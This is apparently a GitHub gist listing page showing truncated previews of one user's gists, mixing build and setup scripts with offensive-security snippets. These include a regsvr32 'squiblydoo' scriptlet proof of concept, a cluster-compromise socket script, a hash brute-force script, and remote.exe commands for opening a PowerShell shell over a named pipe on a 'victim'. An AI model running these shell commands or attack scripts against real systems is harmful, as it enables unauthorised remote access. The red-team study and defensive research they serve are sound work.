yashodhank
/ Dockerfile
Created
January 22, 2017 20:49
— forked from allanlw/Dockerfile
Secretgrind Dockerfile
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| FROM ubuntu:14.04 | |
| # Ubuntu 14.04 is used instead of 16.04, because 16.04 has too new a version of GCC | |
| # and valgrind configure complains | |
| # automake is needed for aclocal to build the valgrind code | |
| # wget and git for fetching source | |
| # python is required for building capstone | |
| RUN apt-get update && apt-get -y install \ | |
| build-essential \ |
yashodhank
/ Backdoor-Minimalist.sct
Created
January 22, 2017 20:51
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| progid="PoC" | |
| classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
| <!-- Proof Of Concept - Casey Smith @subTee --> | |
| <!-- License: BSD3-Clause --> | |
| <script language="JScript"> | |
| <![CDATA[ | |
yashodhank
/ linux.sh
Created
January 23, 2017 07:20
— forked from marcan/linux.sh
Linux kernel initialization, translated to bash
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/boot/bzImage | |
| # Linux kernel userspace initialization code, translated to bash | |
| # (Minus floppy disk handling, because seriously, it's 2017.) | |
| # Not 100% accurate, but gives you a good idea of how kernel init works | |
| # GPLv2, Copyright 2017 Hector Martin <[email protected]> | |
| # Based on Linux 4.10-rc2. | |
| # Note: pretend chroot is a builtin and affects the current process | |
| # Note: kernel actually uses major/minor device numbers instead of device name |
yashodhank
/ dynamic_domains.lst
Created
January 23, 2017 07:23
List of dynamic domains (not complete yet)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Includes http://www.prout.be/dns/ | |
| # Includes Dyn.com | |
| # Includes now-ip.com | |
| # Includes changeip.com | |
| # Includes dnsdynamic.org | |
| # Includes cjb.net | |
| # Includes pubyun.com (some of it at least) | |
| # Includes darweb.com | |
| # Includes dhis.org | |
| # Includes dhs.org |
yashodhank
/ brute_force_hash_encoding.py
Created
January 23, 2017 07:23
Attempt to brute force the hashing/encoding methods for stored passwords
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from hashlib import sha1, sha256, sha224, sha384, sha512, md5 | |
| from base64 import b64encode, b32encode | |
| digest = "894b186bf79d4337c4f44140a2ec12b42d13a79f".decode("hex") | |
| hexdigest = "894b186bf79d4337c4f44140a2ec12b42d13a79f" | |
| methods = { | |
| "encode_hex": lambda x: x.encode("hex"), |
yashodhank
/ Julia_Full_Cluster_Compromise.py
Created
January 23, 2017 07:23
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| import time | |
| import struct | |
| from random import randint | |
| TCP_IP = "172.16.195.169" | |
| TCP_PORT = 9009 | |
| def send_payload(packet): |
yashodhank
/ psx.py
Created
January 23, 2017 07:24
— forked from anonymous/psx.py
PowerShell decoder by @JohnLaTwC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## hacked together by @JohnLaTwC, Nov 2016, v 0.5 | |
| ## This script attempts to decode common PowerShell encoded scripts. This version handles: | |
| ## * base64 data which encode unicode, gzip, or deflate encoded strings | |
| ## * it can operate on a file or stdin | |
| ## * it can run recursively in the event of multiple layers | |
| ## With apologies to @Lee_Holmes for using Python instead of PowerShell | |
| ## | |
| import sys | |
| import zlib | |
| import re |
yashodhank
/ gist:98e6dc5132be7013f27064b4723498a9
Created
January 23, 2017 07:26
— forked from mattifestation/gist:8ef36782ceb7f73d74cfb00c2a710301
remote.exe - a useful, MS signed SMB shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Command to run on the victim | |
| # This will establish a PowerShell listener over the "pwnme" named pipe | |
| remote /S "powershell.exe" pwnme | |
| # Commands to run on an attacker system - if remote.exe is desired on the client (versus developing your own SMB pipe client) | |
| runas /netonly /user:[Domain|Hostname\Username] "cmd" | |
| remote /C [Hostname\IP] "pwnme" |
yashodhank
/ NanoServerBareMetalCI.xml
Created
January 23, 2017 07:26
— forked from mattifestation/NanoServerBareMetalCI.xml
A working code integrity policy that I was able to deploy to my bare metal Nano Server install on my Intel NUC.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8"?> | |
| <SiPolicy xmlns="urn:schemas-microsoft-com:sipolicy"> | |
| <VersionEx>1.0.0.0</VersionEx> | |
| <PolicyTypeID>{A244370E-44C9-4C06-B551-F6016E563076}</PolicyTypeID> | |
| <PlatformID>{2E07F7E4-194C-4D20-B7C9-6F44A6C5A234}</PlatformID> | |
| <Rules> | |
| <Rule> | |
| <Option>Enabled:Unsigned System Integrity Policy</Option> | |
| </Rule> | |
| <Rule> |
yashodhank
/ NanoServerSetup.ps1
Created
January 23, 2017 07:26
— forked from mattifestation/NanoServerSetup.ps1
My setup steps to get Nano Server running on bare metal on my Intel NUC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #region Step #1 (optional): Salvaging of drivers | |
| # I had to manually install a disk and network driver the last time I installed Nano Server. | |
| # I saved my previous WIM file and exported the installed drivers using the Dism cmdlets. | |
| # These paths are specific to my system. | |
| # This was my old Nano Server TP5 image. | |
| $NanoTP5ImagePath = 'C:\Users\Matt\Desktop\Temp\NanoTP5Setup\NanoServerBin\NanoServer.wim' | |
| $WimTempMountDir = 'C:\Users\Matt\Desktop\TempMountDir' | |
| $ExportedDriverDir = 'C:\Users\Matt\Desktop\ExportedDrivers' |